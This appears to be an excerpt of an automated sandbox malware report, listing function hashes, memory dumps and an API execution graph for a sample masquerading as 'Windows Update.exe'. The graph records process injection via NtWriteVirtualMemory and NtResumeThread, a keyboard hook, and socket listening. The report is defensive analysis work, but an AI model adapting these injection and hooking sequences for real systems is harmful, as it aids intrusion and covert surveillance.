                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                                                                                  • Instruction ID: 1c8cf4990013556009a943ce68bbe5c533817c3d042a03847a5f6a4628de1edc
                                                                                  • Opcode Fuzzy Hash: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                                                                                  • Instruction Fuzzy Hash: DA01E8326159308FA389DE3AC80144377E3FFCA32532AC1E5C945AB57DD6316847DB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C23C4D, Relevance: .0, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                                                                                  • Instruction ID: e46ac8c8d649937048925bbc22b10e31c7d260e61c9919193dd0f57e0586c858
                                                                                  • Opcode Fuzzy Hash: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                                                                                  • Instruction Fuzzy Hash: 75011E326019208FA38DCE3AC80545377E3FFCA325326C1E8D845AB579D6316802CBD4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005514C0, Relevance: .0, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                  • Instruction ID: f961592b2f1d145e105b414baeb708aa2f288bac5fdf7e79b66c5d6e71879169
                                                                                  • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                  • Instruction Fuzzy Hash: CEB09236E04008DADF008EC4B4413FCFB70F78232AF242163C619B3501823686685689
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005517F8, Relevance: .0, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                  • Instruction ID: 2ada32c6dfefcc707ecd0da99efed46e99b652b66efdfa9fe9524fe429dd81ee
                                                                                  • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                  • Instruction Fuzzy Hash: A1B0923AE040089ADB008ED8B4413FCFBB4F78622AF202563C618B350082318268568D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00550728, Relevance: .0, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                  • Instruction ID: 4bd273165d5c8127b1bcd12174d887af657b53b97671f222263baf30ba6005c5
                                                                                  • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                  • Instruction Fuzzy Hash: 51B09236E040089ADB008EC4B4413FCFB70F78632AF202063C619B3580823192685A89
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00BCB1E6, Relevance: 60.3, Strings: 48, Instructions: 282COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                                  • API String ID: 0-140969752
                                                                                  • Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                  • Instruction ID: d7373e3886d299facb19fa38ffe25c07a9585a3c205d4b0bd5bec206062aa402
                                                                                  • Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                  • Instruction Fuzzy Hash: 8AF1F0209087E9D9DB32C6788C09BCDBEA45B23324F0442D9D1E87A2D2D7B54BC5CB66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C2E67A, Relevance: 57.8, Strings: 46, Instructions: 307COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @A$ AA$ BA$(@A$(AA$(BA$0@A$0AA$0BA$8@A$8AA$8BA$@@A$@AA$@BA$H@A$HAA$HBA$P@A$PAA$PBA$X@A$XAA$XBA$`@A$`AA$`BA$h?A$h@A$hAA$hBA$p?A$p@A$pAA$pBA$t?A$x?A$x@A$xAA$xBA$?A$?A$@A$@A$AA$AA
                                                                                  • API String ID: 0-2473593039
                                                                                  • Opcode ID: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                                  • Instruction ID: cd2b09867844d9088b589d34e87405ba50e4b71092ccb6c344aac6b2ca440c4f
                                                                                  • Opcode Fuzzy Hash: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                                  • Instruction Fuzzy Hash: A9F127B08052699FDB21CF95D8487DEBFB0AB96308F5481CAD5593B241C7B90BC9CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C21478, Relevance: 10.1, Strings: 8, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,&A$4'A$<&A$H&A$T&A$d&A$p&A$&A
                                                                                  • API String ID: 0-3237638986
                                                                                  • Opcode ID: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                                  • Instruction ID: cff281b8a1f68f6b20df24dba5bb2c96452f51176c63915be19b708d1d432121
                                                                                  • Opcode Fuzzy Hash: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                                  • Instruction Fuzzy Hash: 94415FB290022DAFDB20DF90DD85ADE3BA8EF14304F104566FD18E7191D7B89A98CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C260BE, Relevance: 8.9, Strings: 7, Instructions: 143COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 5$H$O$b$i$}$}
                                                                                  • API String ID: 0-3760989150
                                                                                  • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                  • Instruction ID: 369aeaa7b9df4ee2e80a0e18e56acf55ccc4a241f882559222376cf1433086b7
                                                                                  • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                  • Instruction Fuzzy Hash: A551D67180429DEEDB11CBA8CC80AEEBBBCEF49314F1442E9E555E6192D3349B84CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C21642, Relevance: 8.9, Strings: 7, Instructions: 118COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (A$4(A$<&A$H&A$d&A$t'A$'A
                                                                                  • API String ID: 0-2857912252
                                                                                  • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                  • Instruction ID: 598e5e76edb8781625c522a77e101a858e117d1bda28810526bc6b189ef5091b
                                                                                  • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                  • Instruction Fuzzy Hash: AE516BB190025D9BDF24EF60DD859DD3BB8FF04308F14802AFD28A6151D7B599A9DF84
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C22E88, Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $/A$,/A$0/A$X7A$`7A
                                                                                  • API String ID: 0-851144607
                                                                                  • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                  • Instruction ID: ec7159110686e017a53c04d8a7116cbfcaf3023df49cf86f8cfea5027d303b34
                                                                                  • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                  • Instruction Fuzzy Hash: 704182B0655642EFC309CF2AC5846C1FBE0BB09314F95C2AFC46C9B221C7B4A565CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C23021, Relevance: 6.3, Strings: 5, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $/A$,/A$0/A$4/A$`7A
                                                                                  • API String ID: 0-2435369464
                                                                                  • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                  • Instruction ID: 05bbdd1307f7371415320b94ee924c87935ee6ecb305c500af30896fb1386503
                                                                                  • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                  • Instruction Fuzzy Hash: 1F01F6B4000B55CAC721EF24D1806C6BBF4FB44305F10C90FE0AA8B204DBB8A29AEF59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00BE9829, Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ^$^1A$^1A$b
                                                                                  • API String ID: 0-1727528133
                                                                                  • Opcode ID: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                                  • Instruction ID: 8e778af74aab0de0cc63dcd7efb63cc437e880c2ecd4d4824484bcfa5b966ee7
                                                                                  • Opcode Fuzzy Hash: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                                  • Instruction Fuzzy Hash: 1861BF71A00285EFDF14DF6AC881BADBBF1EF44310F2481E9E815AB292D735AE54DB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Analysis Process: Windows Update.exe PID: 2360 Parent PID: 2368 Windows Update.exeCOMMON

                                                                                  Execution Graph

                                                                                  Execution Coverage:5.7%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:5.6%
                                                                                  Total number of Nodes:376
                                                                                  Total number of Limit Nodes:23

                                                                                  Graph

                                                                                  execution_graph 51470 6420e6 51471 64210c GetTextExtentPoint32W 51470->51471 51473 642139 51471->51473 51184 641162 51185 641197 WSAEventSelect 51184->51185 51187 6411ce 51185->51187 51474 6413e2 51475 641452 51474->51475 51476 64141a MapViewOfFile 51474->51476 51475->51476 51477 641428 51476->51477 51482 11a09a 51483 11a107 51482->51483 51484 11a0cf recv 51482->51484 51483->51484 51485 11a0dd 51484->51485 51486 11a69a 51487 11a6c6 SetErrorMode 51486->51487 51488 11a6ef 51486->51488 51489 11a6db 51487->51489 51488->51487 51490 6454ea 51491 64553a K32GetModuleFileNameExW 51490->51491 51492 645542 51491->51492 51493 6426ea 51494 642744 51493->51494 51495 642719 GetWindowPlacement 51493->51495 51494->51495 51496 64272e 51495->51496 51188 11b31e 51190 11b356 LsaOpenPolicy 51188->51190 51191 11b397 51190->51191 51192 11b002 51193 11b037 GetTokenInformation 51192->51193 51195 11b074 51193->51195 51196 645172 51197 6451a7 NtQuerySystemInformation 51196->51197 51198 6451d2 51196->51198 51199 6451bc 51197->51199 51198->51197 51200 640b72 51203 640ba7 GetProcessTimes 51200->51203 51202 640bd9 51203->51202 51497 6400f2 51498 640142 OleGetClipboard 51497->51498 51499 640150 51498->51499 51500 644afe 51501 644b33 RegSetValueExW 51500->51501 51503 644b77 51501->51503 51504 6416fe 51505 64174e SHGetFolderPathW 51504->51505 51506 64175c 51505->51506 51204 4e8750 51205 4e877b 51204->51205 51206 4e89a9 51205->51206 51209 4ea6d0 51205->51209 51233 4ea700 51205->51233 51210 4ea730 51209->51210 51212 4ea7f8 51210->51212 51257 646906 51210->51257 51261 6468e0 51210->51261 51211 4ea892 51211->51212 51265 646a6a 51211->51265 51212->51206 51214 4ea8de 51214->51212 51220 646ae5 NtWriteVirtualMemory 51214->51220 51221 646b12 NtWriteVirtualMemory 51214->51221 51215 4ea91e 51215->51212 51216 4ea9cd 51215->51216 51222 646ae5 NtWriteVirtualMemory 51215->51222 51223 646b12 NtWriteVirtualMemory 51215->51223 51216->51212 51226 646ae5 NtWriteVirtualMemory 51216->51226 51227 646b12 NtWriteVirtualMemory 51216->51227 51217 4eaa0f 51229 646a6a NtResumeThread 51217->51229 51218 4eaa2c 51232 646a6a NtResumeThread 51218->51232 51219 4eaa39 51219->51206 51220->51215 51221->51215 51222->51215 51223->51215 51226->51217 51227->51217 51229->51218 51232->51219 51234 4ea730 51233->51234 51236 4ea7f8 51234->51236 51249 646906 CreateProcessA 51234->51249 51250 6468e0 CreateProcessA 51234->51250 51235 4ea892 51235->51236 51255 646a6a NtResumeThread 51235->51255 51236->51206 51237 4ea8c3 51244 646ae5 NtWriteVirtualMemory 51237->51244 51245 646b12 NtWriteVirtualMemory 51237->51245 51238 4ea8de 51238->51236 51247 646ae5 NtWriteVirtualMemory 51238->51247 51248 646b12 NtWriteVirtualMemory 51238->51248 51239 4ea91e 51239->51236 51240 4ea9cd 51239->51240 51253 646ae5 NtWriteVirtualMemory 51239->51253 51254 646b12 NtWriteVirtualMemory 51239->51254 51240->51236 51251 646ae5 NtWriteVirtualMemory 51240->51251 51252 646b12 NtWriteVirtualMemory 51240->51252 51241 4eaa0f 51256 646a6a NtResumeThread 51241->51256 51242 4eaa2c 51246 646a6a NtResumeThread 51242->51246 51243 4eaa39 51243->51206 51244->51238 51245->51238 51246->51243 51247->51239 51248->51239 51249->51235 51250->51235 51251->51241 51252->51241 51253->51239 51254->51239 51255->51237 51256->51242 51258 646941 CreateProcessA 51257->51258 51260 6469d8 51258->51260 51260->51211 51262 646906 CreateProcessA 51261->51262 51264 6469d8 51262->51264 51264->51211 51266 646acf 51265->51266 51267 646a99 NtResumeThread 51265->51267 51266->51267 51268 4ea8c3 51267->51268 51269 646b12 51268->51269 51273 646ae5 51268->51273 51270 646b82 51269->51270 51271 646b4a NtWriteVirtualMemory 51269->51271 51270->51271 51272 646b58 51271->51272 51272->51214 51274 646b12 NtWriteVirtualMemory 51273->51274 51276 646b58 51274->51276 51276->51214 51277 645b7a 51278 645ba6 KiUserCallbackDispatcher 51277->51278 51279 645bda 51277->51279 51280 645bbb 51278->51280 51279->51278 51507 6444fa 51509 644535 LoadLibraryA 51507->51509 51510 644572 51509->51510 51281 643146 51282 64317b GetPerAdapterInfo 51281->51282 51284 6431ae 51282->51284 51285 644a46 51286 644a6f MessageBoxW 51285->51286 51288 644aa0 51286->51288 51511 6465c6 51512 6465fb CertVerifyCertificateChainPolicy 51511->51512 51514 64662a 51512->51514 51515 642dc6 51516 642dec DeleteFileW 51515->51516 51518 642e08 51516->51518 51519 642bc6 51520 642bf5 ShowWindow 51519->51520 51522 642c29 51519->51522 51521 642c0a 51520->51521 51522->51520 51289 64304e 51291 643083 GetAdaptersAddresses 51289->51291 51292 6430bc 51291->51292 51526 645cce 51527 645d06 PeekMessageW 51526->51527 51528 645d3a 51526->51528 51529 645d1b 51527->51529 51528->51527 51530 6453ca 51531 6453ff K32GetModuleInformation 51530->51531 51533 645436 51531->51533 51301 640c5d 51302 640c7a 51301->51302 51303 640c9c 51302->51303 51308 4e264e 51302->51308 51315 4e26e5 51302->51315 51322 4e2197 51302->51322 51329 4e1db8 51302->51329 51309 4e265f 51308->51309 51310 4e2ace 51309->51310 51336 4e70b8 51309->51336 51311 4e2d19 51310->51311 51341 4e7988 51310->51341 51345 4e797a 51310->51345 51311->51302 51316 4e26f6 51315->51316 51317 4e2ace 51316->51317 51319 4e70b8 2 API calls 51316->51319 51318 4e2d19 51317->51318 51320 4e797a KiUserCallbackDispatcher 51317->51320 51321 4e7988 KiUserCallbackDispatcher 51317->51321 51318->51302 51319->51317 51320->51318 51321->51318 51323 4e21a8 51322->51323 51324 4e2ace 51323->51324 51326 4e70b8 2 API calls 51323->51326 51325 4e2d19 51324->51325 51327 4e797a KiUserCallbackDispatcher 51324->51327 51328 4e7988 KiUserCallbackDispatcher 51324->51328 51325->51302 51326->51324 51327->51325 51328->51325 51330 4e1dee 51329->51330 51331 4e2ace 51330->51331 51333 4e70b8 2 API calls 51330->51333 51332 4e2d19 51331->51332 51334 4e797a KiUserCallbackDispatcher 51331->51334 51335 4e7988 KiUserCallbackDispatcher 51331->51335 51332->51302 51333->51331 51334->51332 51335->51332 51337 4e70e0 51336->51337 51338 4e7173 51337->51338 51349 641866 51337->51349 51352 641833 51337->51352 51338->51310 51342 4e799a KiUserCallbackDispatcher 51341->51342 51344 4e79cc 51342->51344 51344->51311 51346 4e79b2 KiUserCallbackDispatcher 51345->51346 51347 4e7983 51345->51347 51348 4e79cc 51346->51348 51347->51346 51348->51311 51350 6418b6 SetWindowsHookExA 51349->51350 51351 6418be 51350->51351 51351->51338 51353 641866 SetWindowsHookExA 51352->51353 51355 6418be 51353->51355 51355->51338 51356 64385e 51357 643893 RegNotifyChangeKeyValue 51356->51357 51359 6438d0 51357->51359 51360 64105e 51361 641096 accept 51360->51361 51363 6410d1 51361->51363 51364 642f5e 51366 642f96 LocalAlloc 51364->51366 51367 642fc6 51366->51367 51534 644bde 51537 644c07 SetFileAttributesW 51534->51537 51536 644c23 51537->51536 51368 11bc2a 51369 11bc62 CreateFileW 51368->51369 51371 11bcb1 51369->51371 51372 64365a 51373 643692 RegOpenCurrentUser 51372->51373 51375 6436c5 51373->51375 51538 11a8ae 51539 11a8da LocalFree 51538->51539 51540 11a910 51538->51540 51541 11a8e8 51539->51541 51540->51539 51376 640426 51377 64045e OpenFileMappingW 51376->51377 51379 640499 51377->51379 51380 640526 51382 64055e MapViewOfFile 51380->51382 51383 6405ad 51382->51383 51542 6433a6 51543 6433f6 FormatMessageW 51542->51543 51544 6433fe 51543->51544 51384 11b952 51385 11b9c2 51384->51385 51386 11b98a setsockopt 51384->51386 51385->51386 51387 11b998 51386->51387 51545 11bed2 51548 11bf07 setsockopt 51545->51548 51547 11bf39 51548->51547 51549 6408a2 51550 6408da CreateMutexW 51549->51550 51552 64091d 51550->51552 51388 11ab56 51391 11ab8e RegOpenKeyExW 51388->51391 51390 11abe4 51391->51390 51553 11a5d6 51554 11a614 DuplicateHandle 51553->51554 51555 11a64c 51553->51555 51556 11a622 51554->51556 51555->51554 51557 643caa 51558 643ce5 getaddrinfo 51557->51558 51560 643d57 51558->51560 51561 6409aa 51562 6409df listen 51561->51562 51564 640a08 51562->51564 51392 11ac5e 51394 11ac93 RegQueryValueExW 51392->51394 51395 11ace7 51394->51395 51396 643236 51397 64326e getnameinfo 51396->51397 51399 6432d5 51397->51399 51400 11bd42 51403 11bd77 GetFileType 51400->51403 51402 11bda4 51403->51402 51404 64133a 51405 64138a CreateFileMappingW 51404->51405 51406 641392 51405->51406 51565 4e8a90 51567 4e8ac0 51565->51567 51566 4e8b88 51567->51566 51578 4e8dd8 51567->51578 51582 646906 CreateProcessA 51567->51582 51583 6468e0 CreateProcessA 51567->51583 51568 4e8c22 51569 4e8c26 51568->51569 51568->51578 51590 646a6a NtResumeThread 51568->51590 51570 4e8c53 51593 646ae5 NtWriteVirtualMemory 51570->51593 51594 646b12 NtWriteVirtualMemory 51570->51594 51571 4e8c6e 51571->51578 51584 646ae5 NtWriteVirtualMemory 51571->51584 51585 646b12 NtWriteVirtualMemory 51571->51585 51572 4e8d5d 51574 4e8d8a 51572->51574 51572->51578 51573 4e8cae 51573->51572 51573->51578 51588 646ae5 NtWriteVirtualMemory 51573->51588 51589 646b12 NtWriteVirtualMemory 51573->51589 51591 646ae5 NtWriteVirtualMemory 51574->51591 51592 646b12 NtWriteVirtualMemory 51574->51592 51575 4e8d9f 51580 646a6a NtResumeThread 51575->51580 51576 4e8dbc 51581 646a6a NtResumeThread 51576->51581 51577 4e8dc9 51579 4e9bc2 51578->51579 51586 4ea6d0 5 API calls 51578->51586 51587 4ea700 5 API calls 51578->51587 51580->51576 51581->51577 51582->51568 51583->51568 51584->51573 51585->51573 51586->51579 51587->51579 51588->51573 51589->51573 51590->51570 51591->51575 51592->51575 51593->51571 51594->51571 51595 644fba 51596 644fe9 AdjustTokenPrivileges 51595->51596 51598 64500b 51596->51598 51599 6419ba 51600 6419e6 LoadLibraryShim 51599->51600 51602 641a14 51600->51602 51603 640dba 51605 640def bind 51603->51605 51606 640e23 51605->51606 51407 11b84e 51408 11b886 WSASocketW 51407->51408 51410 11b8c2 51408->51410 51607 643486 51610 6434bb WSAIoctl 51607->51610 51609 643509 51610->51609 51411 11a172 51412 11a19d gethostname 51411->51412 51413 11a1c4 51412->51413 51414 623104 51415 623067 51414->51415 51417 6230a8 51415->51417 51419 4eab2f 51415->51419 51424 4eab40 51415->51424 51420 4eab40 51419->51420 51429 4ec3aa 51420->51429 51434 4ec3b8 51420->51434 51421 4eabb9 51421->51417 51425 4eab76 51424->51425 51427 4ec3aa 2 API calls 51425->51427 51428 4ec3b8 2 API calls 51425->51428 51426 4eabb9 51426->51417 51427->51426 51428->51426 51430 4ec3b8 51429->51430 51439 11a373 51430->51439 51443 11a3a6 51430->51443 51431 4ec407 51431->51421 51435 4ec3e2 51434->51435 51437 11a373 GetForegroundWindow 51435->51437 51438 11a3a6 GetForegroundWindow 51435->51438 51436 4ec407 51436->51421 51437->51436 51438->51436 51440 11a3a6 GetForegroundWindow 51439->51440 51442 11a3dd 51440->51442 51442->51431 51444 11a405 51443->51444 51445 11a3cf GetForegroundWindow 51443->51445 51444->51445 51446 11a3dd 51445->51446 51446->51431 51447 642d02 51448 642d60 51447->51448 51449 642d2e FindClose 51447->51449 51448->51449 51450 642d43 51449->51450 51611 640f82 51614 640fb7 ioctlsocket 51611->51614 51613 640fe3 51614->51613 51451 64190e 51454 641934 AddAtomW 51451->51454 51453 641950 51454->51453 51615 64358e 51618 6435c3 RasConnectionNotificationA 51615->51618 51617 6435f6 51618->51617 51455 11ad7a 51456 11ada1 EnumThreadWindows 51455->51456 51457 11adcc 51456->51457 51619 11a2fa 51620 11a365 51619->51620 51621 11a326 CloseHandle 51619->51621 51620->51621 51622 11a334 51621->51622 51623 64508a 51625 6450bf K32EnumProcessModules 51623->51625 51626 6450ee 51625->51626 51631 643e8a 51632 643ebf WSAConnect 51631->51632 51634 643ede 51632->51634 51635 64278a 51636 6427bf SendMessageW 51635->51636 51637 6427ea 51635->51637 51638 6427d4 51636->51638 51637->51636 51639 64149e 51640 6414ca UnmapViewOfFile 51639->51640 51641 64150b 51639->51641 51642 6414d8 51640->51642 51641->51640 51643 640e9e 51644 640ed3 getsockname 51643->51644 51646 640f07 51644->51646 51458 11bb6a 51459 11bb96 GetFileAttributesExW 51458->51459 51461 11bbb2 51459->51461 51462 645c1a 51463 645c83 51462->51463 51464 645c4f PostMessageW 51462->51464 51463->51464 51465 645c64 51464->51465 51466 64521a 51469 645243 CopyFileW 51466->51469 51468 64526a 51469->51468 51647 642e9a 51648 642ecf GetAdaptersInfo 51647->51648 51650 642eff 51648->51650

                                                                                  Executed Functions

                                                                                  Function 00640D87, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON
